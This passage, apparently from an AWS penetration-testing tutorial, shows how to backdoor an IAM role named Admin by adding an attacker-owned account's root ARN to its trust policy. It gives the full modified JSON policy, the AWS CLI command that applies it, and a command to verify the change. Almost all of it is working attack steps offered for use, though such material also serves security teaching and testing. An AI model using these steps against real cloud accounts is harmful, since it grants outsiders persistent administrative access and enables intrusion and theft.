We are now going to add our attacker-owned account as a trust policy to this role. First, we will save the value of the AssumeRolePolicyDocument key in the roles trust policy to a local JSON file (trust-policy.json). To add trust to our own account without removing the current trust, we can turn the value of the Principal AWS key from a string to an array. This array will include the root ARN that already is in place and the root ARN of our attacker account. trust-policy.json should look like the following now:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": [
                    "arn:aws:iam::111111111111:root",
                    "arn:aws:iam::012345678912:root"
                ]
            },
            "Action": "sts:AssumeRole"
        }
    ]
}

Next, we will update the role with this trust policy using the AWS CLI:

aws iam update-assume-role-policy --role-name Admin --policy-document file://trust-policy.json --profile Test 

If everything was successful, then the AWS CLI should not return any output to the console. Otherwise, you will see an error and a short description of what went wrong. If we wanted to confirm that everything went correctly, we could use the AWS CLI to get that role and view the trust policy document again:

aws iam get-role --role-name Admin --profile Test 

The response from that command should include the trust policy you just uploaded.

The only other thing we will need to do is to save the role's ARN somewhere locally, so that we don't forget it. In this example, the ARN of our target role was arn:aws:iam::111111111111:role/Admin. Now everything is done.